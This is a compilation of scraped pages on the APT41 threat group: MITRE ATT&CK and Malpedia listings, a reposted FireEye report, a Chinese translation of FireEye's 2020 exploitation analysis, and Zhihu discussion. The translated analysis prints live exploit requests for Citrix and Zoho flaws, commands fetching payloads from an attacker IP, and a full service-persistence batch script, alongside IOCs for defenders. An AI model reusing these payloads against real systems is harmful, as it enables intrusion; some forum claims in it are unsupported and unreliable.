Obfuscated Files or Information: Command Obfuscation,
OS Credential Dumping: LSASS Memory,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Query Registry,
Reflective Code Loading,
Scheduled Task/Job: Scheduled Task,
Screen Capture,
Steal or Forge Kerberos Tickets: Kerberoasting,
Unsecured Credentials: Credentials in Registry,
Unsecured Credentials: Group Policy Preferences,
Windows Management Instrumentation
S0006
pwdump
[1]
OS Credential Dumping: Security Account Manager
S0112
ROCKBOOT
[1]
Pre-OS Boot: Bootkit
S0596
ShadowPad
[1][8]
Application Layer Protocol: DNS,
Application Layer Protocol: File Transfer Protocols,
Application Layer Protocol: Web Protocols,
Data Encoding: Non-Standard Encoding,
Deobfuscate/Decode Files or Information,
Dynamic Resolution: Domain Generation Algorithms,
Indicator Removal,
Ingress Tool Transfer,
Modify Registry,
Non-Application Layer Protocol,
Obfuscated Files or Information: Fileless Storage,
Obfuscated Files or Information,
Process Discovery,
Process Injection,
Process Injection: Dynamic-link Library Injection,
Scheduled Transfer,
System Information Discovery,
System Network Configuration Discovery,
System Owner/User Discovery,
System Time Discovery
S0430
Winnti for Linux
[3]
Application Layer Protocol: Web Protocols,
Deobfuscate/Decode Files or Information,
Encrypted Channel: Symmetric Cryptography,
Ingress Tool Transfer,
Non-Application Layer Protocol,
Obfuscated Files or Information,
Rootkit,
Traffic Signaling
S0412
ZxShell
[1]
Access Token Manipulation: Create Process with Token,
Application Layer Protocol: Web Protocols,
Application Layer Protocol: File Transfer Protocols,
Command and Scripting Interpreter: Windows Command Shell,
Create Account: Local Account,
Create or Modify System Process: Windows Service,
Data from Local System,
Endpoint Denial of Service,
Exploit Public-Facing Application,
File and Directory Discovery,
Impair Defenses: Disable or Modify System Firewall,
Impair Defenses: Disable or Modify Tools,
Indicator Removal: Clear Windows Event Logs,
Indicator Removal: File Deletion,
Ingress Tool Transfer,
Input Capture: Credential API Hooking,
Input Capture: Keylogging,
Modify Registry,
Native API,
Network Service Discovery,
Non-Standard Port,
Process Discovery,
Process Injection: Dynamic-link Library Injection,
Proxy,
Query Registry,
Remote Services: VNC,
Remote Services: Remote Desktop Protocol,
Screen Capture,
System Binary Proxy Execution: Rundll32,
System Information Discovery,
System Owner/User Discovery,
System Service Discovery,
System Services: Service Execution,
Video Capture
References
Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.
Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.
Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram. (2022, March 8). Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments. Retrieved July 8, 2022.
Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.
Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.
Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.
Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.
×
load more results
Contact Us
Terms of Use
Privacy Policy
Website Changelog
© 2015 - 2024, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation.
美国公司fireeye对APT41的调查报告原文 - 知乎
美国公司fireeye对APT41的调查报告原文 - 知乎切换模式写文章登录/注册美国公司fireeye对APT41的调查报告原文烟斗汪game热爱好游戏,探索新事物我认为fireeye是一个危险的美国公司,严重威胁中国的网络安全,说真的,肯定是美国政府的走狗!原文如下:Threat ResearchAPT41: A Dual Espionage and Cyber Crime OperationAugust 07, 2019 | by Nalani Fraser, Fred Plan, Jacqueline O’Leary, Vincent Cannon, Raymond Leong, Dan Perez, Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).Who Does APT41 Target?Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.Figure 1: Timeline of industries directly targeted by APT41Probable Chinese Espionage ContractorsTwo identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012The Right Tool for the JobAPT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.Fast and RelentlessAPT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.Looking AheadAPT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.(图片未上传)发布于 2019-10-12 23:52美国公司美国调查报告赞同 12 条评论分享喜欢收藏申请
APT41多漏洞网络攻击分析 - FreeBuf网络安全行业门户
APT41多漏洞网络攻击分析 - FreeBuf网络安全行业门户
主站 分类
漏洞
工具
极客
Web安全
系统安全
网络安全
无线安全
设备/客户端安全
数据安全
安全管理
企业安全
工控安全
特色
头条
人物志
活动
视频
观点
招聘
报告
资讯
区块链安全
标准与合规
容器安全
公开课
报告 专辑 ···公开课···商城···
用户服务
··· 行业服务
政 府
CNCERT
CNNVD
会员体系(甲方)
会员体系(厂商)
产品名录
企业空间
知识大陆 搜索 创作中心 登录注册 官方公众号企业安全新浪微博 FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。 FreeBuf+小程序把安全装进口袋 APT41多漏洞网络攻击分析
关注
网络安全 APT41多漏洞网络攻击分析
2020-04-20 13:00:41
研究人员发现自今年开始APT41开展了大范围的网络活动。从1月20日到3月11日APT41利用了Citrix NetScaler/ADC,Cisco路由器和Zoho ManageEngine Desktop Central等漏洞进行攻击攻击活动。目标国家包括澳大利亚,加拿大,丹麦,芬兰,法国,印度,意大利,日本,马来西亚,墨西哥,菲律宾,波兰,卡塔尔,沙特,新加坡,瑞典,瑞士,阿联酋,英国和美国等。目标行业包括:银行/金融,建筑,国防工业,政府,医疗,高科技,高等教育,法律,制造业,媒体,石油和天然气,制药,房地产,电信,运输,旅行等。目前尚不清楚APT41是扫描全网进行大规模攻击还是选择了特定目标,但从受害者角度来看攻击更具针对性。漏洞利用CVE-2019-19781 (Citrix Application Delivery Controller [ADC])2020年1月20日开始,APT41使用IP地址66.42.98 [.] 220尝试利用漏洞CVE-2019-19781(于2019年12月17日发布)。时间线:最初利用CVE-2019-19781攻击发生在2020年1月20日和2020年1月21日,攻击活动中会执行命令‘file /bin/pwd’。 首先将确认系统是否存在漏洞,有没有部署相关漏洞缓解措施。 其次返回目标体系结构相关信息,为APT41后续部署后门提供信息。所有观察到的请求仅针对Citrix设备执行,APT41利用已知设备列表进行操作。HTTP POST示例:POST /vpns/portal/scripts/newbm.pl HTTP/1.1Host: [redacted]Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.22.0NSC_NONCE: nsrootNSC_USER: ../../../netscaler/portal/templates/[redacted]Content-Length: 96url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]1月23日至2月1日之间APT41活动暂停,从2月1日开始APT41开始使用CVE-2019-19781漏洞,这些载荷通过FTP下载。 APT41执行命令'/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’,连接到66.42.98 [.] 220,使用用户名“ test”和密码登录到FTP服务器,然后下载“ bsd”有效负载(可能是后门)。HTTP POST示例:POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 147Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]2月24日和2月25日CVE-2019-19781的利用次数显着增加,仅载荷名发生了变化。POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1Accept-Encoding: identityContent-Length: 145Connection: closeNsc_User: ../../../netscaler/portal/templates/[redacted]User-Agent: Python-urllib/2.7Nsc_Nonce: nsrootHost: [redacted]Content-Type: application/x-www-form-urlencodedurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]Cisco Router2020年2月21日APT41成功攻击了一家电信组织的Cisco RV320路由器,并下载了为名为“ fuc”(MD5:155e98e5ca8d662fad7dc84187340cbc)的64位MIPS有效负载。Metasploit模块结合了两个CVE(CVE-2019-1653和CVE-2019-1652)在Cisco RV320和RV325小型企业路由器上实现远程代码执行,并使用wget下载有效负载。66.42.98 [.] 220还托管了文件http://66.42.98[.] 220/test/1.txt(MD5:c0c467c8e9b2046d7053642cc9bdd57d)的内容为“ cat/etc/flash/etc/nk_sysconfig”,该命令可在Cisco RV320路由器上执行显示当前配置。 Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability Cisco Small Business RV320 and RV325 Routers Command Injection VulnerabilityCVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)3月5日研究人员发布了CVE-2020-10189验证代码。 从3月8日开始APT41使用91.208.184 [.] 78来试图利用Zoho ManageEngine漏洞,有效负载(install.bat和storesyncsvc.dll)有两个不同的变化。 在第一个变体中,使用CVE-2020-10189漏洞直接上传“ logger.zip”,其中包含一组命令可使用PowerShell下载并执行install.bat和storesyncsvc.dll。java/lang/RuntimegetRuntime()Ljava/lang/Runtime;Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat'(Ljava/lang/String;)Ljava/lang/Process;StackMapTableysoserial/Pwner76328858520609Lysoserial/Pwner76328858520609;在第二个版本中APT41利用Microsoft BITSAdmin工具从66.42.98 [.] 220端口12345下载install.bat(MD5:7966c2c546b71e800397a67f942858d0)。Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exeProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat两种变体都使用install.bat批处理文件来安装名为storesyncsvc.dll(MD5:5909983db4d9023e4098e56361c96a6f)。install.bat内容:@echo offset "WORK_DIR=C:\Windows\System32"set "DLL_NAME=storesyncsvc.dll"set "SERVICE_NAME=StorSyncSvc"set "DISPLAY_NAME=Storage Sync Service"set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." sc stop %SERVICE_NAME%sc delete %SERVICE_NAME%mkdir %WORK_DIR%copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Yreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /fsc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000sc description "%SERVICE_NAME%" "%DESCRIPTION%"reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /fnet start "%SERVICE_NAME%"与c2服务通联:GET /jquery-3.3.1.min.js HTTP/1.1Host: cdn.bootcss.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Referer: http://cdn.bootcss.com/Accept-Encoding: gzip, deflateCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLIUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-Alive Cache-Control: no-cache在攻击利用几个小时内,APT41使用storecyncsvc.dll BEACON后门下载了具有不同C2地址的辅助后门,然后下载2.exe(MD5:3e856162c36b532925c8226b4ed3481c)。2.exe是VMProtected Meterpreter下载器,用于下载Cobalt Strike BEACON shellcode。该组利用多次入侵来延迟对其其他工具的分析。总结APT41这次活动中的扫描和攻击体现了其漏洞利用速度越来越快,目标信息搜集范围逐步扩大。此前美国防部确认,APT41成功利用CVE-2019-3396(Atlassian Confluence)攻击美国一所大学。可见APT41在从事间谍活动同时也在进行以经济利益为动机的网络活动。IOCs Type Indicator CVE-2019-19781 Exploitation (Citrix Application Delivery Control) 66.42.98[.]220 CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’ /tmp/bsd /tmp/un Cisco Router Exploitation 66.42.98\.220 ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d) ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc CVE-2020-10189 (Zoho ManageEngine Desktop Central) 66.42.98[.]220 91.208.184[.]78 74.82.201[.]8 exchange.dumb1[.]com install.bat (MD5: 7966c2c546b71e800397a67f942858d0) storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f) C:\Windows\Temp\storesyncsvc.dll C:\Windows\Temp\install.bat 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c) C:\Users\[redacted]\install.bat TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9) C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78 PowerShell downloading files with Net.WebClient Platform Signature Name Endpoint Security BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY) CERTUTIL.EXE DOWNLOADER A (UTILITY) Generic.mg.5909983db4d9023e Generic.mg.3e856162c36b5329 POWERSHELL DOWNLOADER (METHODOLOGY) SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY) Network Security Backdoor.Meterpreter DTI.Callback Exploit.CitrixNetScaler Trojan.METASTAGE Exploit.ZohoManageEngine.CVE-2020-10198.Pwner Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader Helix CITRIX ADC [Suspicious Commands] EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] MALWARE METHODOLOGY [Certutil User-Agent] WINDOWS METHODOLOGY [BITSadmin Transfer] WINDOWS METHODOLOGY [Certutil Downloader] ATT&CK Techniques Initial Access External Remote Services (T1133), Exploit Public-Facing Application (T1190) Execution PowerShell (T1086), Scripting (T1064) Persistence New Service (T1050) Privilege Escalation Exploitation for Privilege Escalation (T1068) Command And Control Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) Defense Evasion BITS Jobs (T1197), Process Injection (T1055) *参考来源:fireeye,由Kriston编译,转载请注明来自FreeBuf.COM 本文作者:,
转载请注明来自FreeBuf.COM # 漏洞 # 攻击分析 # APT41
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
展开更多
相关推荐
关 注 0 文章数 0 关注者 本站由阿里云 提供计算与安全服务 用户服务 有奖投稿 提交漏洞 参与众测 商城 企业服务 安全咨询 产业全景图 企业SRC 安全众测 合作信息 斗象官网 广告投放 联系我们 友情链接 关于我们 关于我们 加入我们 微信公众号 新浪微博 战略伙伴 FreeBuf+小程序 扫码把安全装进口袋 斗象科技 FreeBuf 漏洞盒子 斗象智能安全平台 免责条款 协议条款
Copyright © 2020 WWW.FREEBUF.COM All Rights Reserved
沪ICP备13033796号
|
沪公安网备
如何看待APT41攻击Team Viewer公司事件? - 知乎
如何看待APT41攻击Team Viewer公司事件? - 知乎首页知乎知学堂发现等你来答切换模式登录/注册网络安全黑客 (Hacker)信息安全DDoS如何看待APT41攻击Team Viewer公司事件?APT41攻击Team Viewer的最大目的是什么,这将会给国内各单位及公司造成什么样的影响呢? [图片]显示全部 关注者9被浏览9,333关注问题写回答邀请回答好问题添加评论分享3 个回答默认排序西帅我是来知乎听故事的 关注APT41 并非境外组织,teamviewer 和其他英文机构没有报道,微博已自删,图片时间是 17 年的记录。发布于 2019-10-12 14:39赞同 21 条评论分享收藏喜欢收起知乎用户乌龙事件,APT41 是国内的黑客组织,并且也没有第一手证据,还是前几年的事情。就现在情况看来,国外没有任何一家安全公司对此表示知情,如赛门铁克、卡巴斯基等均未对此发表评论,teamviewer官方也未对此事件发表看法或正式官方声明。倒是国内某些安全厂商借所谓不知真假的深圳网安的通知大做文章,呵呵了。奇安信:并没有发现近期TeamViewer被攻击植入恶意代码事件,所以不必产生不必要的恐慌,至于TeamViewer这个可能直接穿透防火墙的远控软件的使用是否符合公司和组织的安全策略还请慎重决择。编辑于 2019-10-12 21:17赞同 3添加评论分享收藏喜欢收起
APT41 (Threat Actor)
APT41 (Threat Actor)
Please enable JavaScript to use all features of this site. InventoryStatisticsUsageApiVectorLoginSYMBOLCOMMON_NAMEaka. SYNONYMS
APT41
(Back to overview)
aka: Amoeba, BARIUM, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Brass Typhoon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Red Kelpie, TA415, WICKED PANDA, WICKED SPIDER
APT41 is a prolific cyber threat group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity potentially outside of state control.
Associated Families
elf.messagetap
win.biopass
win.coldlock
win.crackshot
win.dboxagent
win.easynight
win.highnoon
win.highnoon_bin
win.jumpall
win.poisonplug
win.serialvlogger
win.zxshell
apk.dragonegg
win.chinachopper
win.acehash
win.blackcoffee
win.crosswalk
win.derusbi
win.gearshift
win.lowkey
win.moonbounce
win.skip20
elf.keyplug
apk.wyrmspy
win.cobalt_strike
win.plugx
win.shadowpad
References
×Select Content2024-03-01
⋅
HarfangLab
⋅
HarfangLab CTIA Comprehensive Analysis of i-SOON’s Commercial Offering ShadowPad
Winnti
×Select Content2024-03-01
⋅
Medium b.magnezi
⋅
0xMrMagneziMalware Analysis - Cobalt Strike Cobalt Strike
×Select Content2024-02-21
⋅
YouTube (SentinelOne)
⋅
Kris McConkeyLABSCon23 Replay | Chasing Shadows | The rise of a prolific espionage actor 9002 RAT
PlugX
ShadowPad
Spyder
×Select Content2024-02-09
⋅
Censys
⋅
Censys,
Embee_researchA Beginners Guide to Tracking Malware Infrastructure AsyncRAT
BianLian
Cobalt Strike
QakBot
×Select Content2024-02-08
⋅
YouTube (Embee Research)
⋅
Embee_researchCobalt Strike Decoding and C2 Extraction - 3 Minute Malware Analysis Speedrun Cobalt Strike
×Select Content2024-01-25
⋅
JSAC 2024
⋅
Yi-Chin Chuang,
Yu-Tung ChangUnveiling TeleBoyi: Chinese APT Group Targeting Critical Infrastructure Worldwide PlugX
×Select Content2024-01-25
⋅
JSAC 2024
⋅
Hara Hiroaki,
Kawakami Ryonosuke,
Shota NakajimaThe Secret Life of RATs: connecting the dots by dissecting multiple backdoors DracuLoader
GroundPeony
HemiGate
PlugX
×Select Content2024-01-23
⋅
CSIRT-CTI
⋅
CSIRT-CTIStately Taurus Targets Myanmar Amidst Concerns over Military Junta’s Handling of Rebel Attacks PlugX
TONESHELL
Unidentified 094
×Select Content2024-01-13
⋅
YouTube (Embee Research)
⋅
Embee_researchCobalt Strike Shellcode Analysis and C2 Extraction Cobalt Strike
×Select Content2024-01-12
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q4 2023 FluBot
Hook
FAKEUPDATES
AsyncRAT
BianLian
Cobalt Strike
DCRat
Havoc
IcedID
Lumma Stealer
Meterpreter
NjRAT
Pikabot
QakBot
Quasar RAT
RecordBreaker
RedLine Stealer
Remcos
Rhadamanthys
Sliver
×Select Content2024-01-09
⋅
Recorded Future
⋅
Insikt Group2023 Adversary Infrastructure Report AsyncRAT
Cobalt Strike
Emotet
PlugX
ShadowPad
×Select Content2024-01-04
⋅
Netresec
⋅
Erik HjelmvikHunting for Cobalt Strike in PCAP Cobalt Strike
×Select Content2023-12-20
⋅
Twitter (@embee_research)
⋅
Embee_researchDefeating Obfuscated Malware Scripts - Cobalt Strike Cobalt Strike
×Select Content2023-12-19
⋅
Twitter (@embee_research)
⋅
Embee_researchFree Ghidra Tutorials for Beginners Cobalt Strike
DarkGate
×Select Content2023-12-18
⋅
Medium (Cryptax)
⋅
Axelle ApvrilleOrganizing malware analysis with Colander: example on Android/WyrmSpy WyrmSpy
×Select Content2023-12-11
⋅
Sentinel LABS
⋅
Aleksandar Milenkoski,
Bendik HagenSandman APT | China-Based Adversaries Embrace Lua KEYPLUG
LuaDream
×Select Content2023-12-08
⋅
Twitter (@embee_research)
⋅
Embee_researchGhidra Basics - Manual Shellcode Analysis and C2 Extraction Cobalt Strike
×Select Content2023-12-06
⋅
splunk
⋅
Splunk Threat Research TeamUnmasking the Enigma: A Historical Dive into the World of PlugX Malware PlugX
×Select Content2023-12-04
⋅
The DFIR Report
⋅
The DFIR ReportSQL Brute Force leads to Bluesky Ransomware BlueSky
Cobalt Strike
×Select Content2023-11-19
⋅
Twitter (@embee_research)
⋅
Embee_researchCombining Pivot Points to Identify Malware Infrastructure - Redline, Smokeloader and Cobalt Strike Amadey
Cobalt Strike
RedLine Stealer
SmokeLoader
×Select Content2023-11-14
⋅
Medium joshuapenny88
⋅
Joshua PennyHostingHunter Series: CHANG WAY TECHNOLOGIES CO. LIMITED Hook
Hydra
Cobalt Strike
SectopRAT
×Select Content2023-11-10
⋅
NSFOCUS
⋅
NSFOCUSThe New APT Group DarkCasino and the Global Surge in WinRAR 0-Day Exploits Cobalt Strike
Konni
DarkCasino
Opal Sleet
×Select Content2023-11-07
⋅
SOCRadar
⋅
SOCRadarNew Gootloader Variant “GootBot” Changes the Game in Malware Tactics GootLoader
Cobalt Strike
UNC2565
×Select Content2023-11-06
⋅
Twitter (@embee_research)
⋅
Embee_researchUnpacking Malware With Hardware Breakpoints - Cobalt Strike Cobalt Strike
×Select Content2023-11-01
⋅
nccgroup
⋅
Mick KoomenPopping Blisters for research: An overview of past payloads and exploring recent developments Blister
Cobalt Strike
×Select Content2023-10-23
⋅
Twitter (@embee_research)
⋅
Embee_researchCobalt Strike .VBS Loader - Decoding with Advanced CyberChef and Emulation Cobalt Strike
×Select Content2023-10-20
⋅
Twitter (@embee_research)
⋅
Embee_researchDecoding a Cobalt Strike .hta Loader Using CyberChef and Emulation Cobalt Strike
×Select Content2023-10-18
⋅
Twitter (@embee_research)
⋅
Embee_researchGhidra Tutorial - Using Entropy To Locate a Cobalt Strike Decryption Function Cobalt Strike
×Select Content2023-10-12
⋅
Spamhaus
⋅
Spamhaus Malware LabsSpamhaus Botnet Threat Update Q3 2023 FluBot
AsyncRAT
Ave Maria
Cobalt Strike
DCRat
Havoc
IcedID
ISFB
Nanocore RAT
NjRAT
QakBot
Quasar RAT
RecordBreaker
RedLine Stealer
Remcos
Rhadamanthys
Sliver
Stealc
Tofsee
Vidar
×Select Content2023-10-12
⋅
Netresec
⋅
Erik HjelmvikForensic Timeline of an IcedID Infection Cobalt Strike
IcedID
IcedID Downloader
×Select Content2023-10-10
⋅
Symantec
⋅
Threat Hunter TeamGrayling: Previously Unseen Threat Actor Targets Multiple Organizations in Taiwan Cobalt Strike
Havoc
MimiKatz
Grayling
×Select Content2023-10-03
⋅
Malware Traffic Analysis
⋅
Brad Duncan2023-10-03 (Tuesday) - PikaBot infection with Cobalt Strike Cobalt Strike
Pikabot
×Select Content2023-10-02
⋅
ThreatFabric
⋅
ThreatFabricLightSpy mAPT Mobile Payment System Attack DragonEgg
WyrmSpy
lightSpy
×Select Content2023-09-22
⋅
Mandiant
⋅
Dan Black,
Josh Atkins,
Luke JenkinsBackchannel Diplomacy: APT29’s Rapidly Evolving Diplomatic Phishing Operations Brute Ratel C4
Cobalt Strike
EnvyScout
GraphDrop
QUARTERRIG
sRDI
Unidentified 107 (APT29)
×Select Content2023-09-12
⋅
⋅
ANSSI
⋅
ANSSIFIN12: A Cybercriminal Group with Multiple Ransomware BlackCat
Cobalt Strike
Conti
Hive
MimiKatz
Nokoyawa Ransomware
PLAY
Royal Ransom
Ryuk
SystemBC
×Select Content2023-09-12
⋅
Symantec
⋅
Threat Hunter TeamRedfly: Espionage Actors Continue to Target Critical Infrastructure ShadowPad
Redfly
×Select Content2023-09-08
⋅
PolySwarm Tech Team
⋅
The HivemindCarderbee Targets Hong Kong in Supply Chain Attack PlugX
Carderbee
×Select Content2023-09-07
⋅
Sekoia
⋅
Jamila B.My Tea’s not cold. An overview of China’s cyber threat Melofee
PingPull
SoWaT
Sword2033
MgBot
MQsTTang
PlugX
TONESHELL
Dalbit
MirrorFace
